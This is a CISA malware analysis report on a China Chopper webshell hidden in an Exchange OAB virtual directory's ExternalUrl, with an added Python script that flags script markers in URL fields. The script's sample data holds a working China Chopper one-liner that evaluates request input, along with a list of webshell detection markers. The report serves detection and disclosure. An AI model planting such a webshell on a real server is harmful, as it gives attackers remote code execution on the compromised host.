MAR-10329298-1.v1: China Chopper Webshell

Notification


This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.


This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.


Summary



Description

CISA received one file for analysis. The file appears to contain configuration data for a Microsoft Exchange Offline Address Book (OAB) Virtual Directory (VD) extracted from a Microsoft Exchange Server. The output file shows malicious modifications to the ExternalUrl parameter of the VD on the targeted Exchange Server. Instead of a URL, the ExternalUrl parameter contains a "China Chopper" webshell, which may permit a remote operator to dynamically execute attacker-supplied server-side script (JScript evaluated by ASP.NET) on the compromised Microsoft Exchange Server.
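The practical check that follows from this finding is to review every OAB virtual directory's InternalUrl and ExternalUrl and flag any value that is not a plain URL. The script below is an added example written for this page, not code from CISA or from the analyzed file: it parses a constructed dump in the shape an Exchange Management Shell listing such as Get-OabVirtualDirectory | Format-List produces (including the wrapped continuation lines Format-List emits for long values) and flags URL fields that carry script markers. The server names, URLs and the China Chopper style ExternalUrl value in SAMPLE_DUMP are constructed for illustration; they are not indicators taken from the submitted sample.

```python
import re
from urllib.parse import urlsplit

# Constructed sample (not the analyzed file): a Format-List style dump of two
# OAB virtual directories. The first is benign; the second carries a China
# Chopper style webshell in ExternalUrl, wrapped across two lines the way
# Format-List wraps long values at console width.
SAMPLE_DUMP = """\
Name        : OAB (Default Web Site)
Server      : EXCH01
InternalUrl : https://exch01.corp.example/OAB
ExternalUrl : https://mail.example.com/OAB

Name        : OAB (Default Web Site)
Server      : EXCH02
InternalUrl : https://exch02.corp.example/OAB
ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(
              Request["cmd"],"unsafe");}</script>
"""

# "Key : Value" line of a Format-List record (key is a single word).
FIELD_RE = re.compile(r"^(\w+)\s*:\s?(.*)$")

# Substrings that have no business in a virtual directory URL and are typical
# of ASP.NET / China Chopper one-liners.
WEBSHELL_MARKERS = ("<script", "runat=", "eval(", "request[", "<%", "%>")


def parse_vdir_dump(text):
    """Parse Format-List output into a list of {field: value} records.

    Records are separated by blank lines; a line that starts with whitespace
    is a wrapped continuation of the previous field and is joined without a
    separator, which is how Format-List splits long values.
    """
    records, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current, last_key = {}, None
            continue
        match = FIELD_RE.match(line)
        if match and not line[0].isspace():
            last_key = match.group(1)
            current[last_key] = match.group(2).rstrip()
        elif last_key is not None:
            current[last_key] += line.strip()
    if current:
        records.append(current)
    return records


def url_findings(value):
    """Return a list of reasons a URL field looks tampered with (empty if clean)."""
    reasons = []
    lowered = value.lower()
    for marker in WEBSHELL_MARKERS:
        if marker in lowered:
            reasons.append(f"contains {marker!r}")
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        reasons.append("not a plain http(s) URL")
    if any(ch in value for ch in '<>"{}'):
        reasons.append("contains characters not valid in a URL")
    return reasons


def scan_dump(text):
    """Return (server, field, reasons) for every suspicious URL field in the dump."""
    findings = []
    for record in parse_vdir_dump(text):
        for field in ("InternalUrl", "ExternalUrl"):
            value = record.get(field, "")
            reasons = url_findings(value) if value else []
            if reasons:
                findings.append((record.get("Server", "?"), field, reasons))
    return findings


if __name__ == "__main__":
    for server, field, reasons in scan_dump(SAMPLE_DUMP):
        print(f"{server}: {field} is suspicious: {', '.join(reasons)}")
```

Run against a real dump, anything this reports should be treated as a confirmed compromise of that Exchange server rather than a misconfiguration: a virtual directory URL has no legitimate reason to contain script tags or an eval of request data.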


For a downloadable copy of IOCs, see: MAR-10329298-1.v1.stix.


Submitted Files (1)

bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61 (E3MsTjP8.aspx)



Findings



bda1b5b349bfc15b20c3c9cbfabd7ae8473cee8d000045f78ca379a629d97a61


Tags

backdoor


Details
Name
E3MsTjP8.aspx
Size
2353 bytes
Type
HTML document, ..
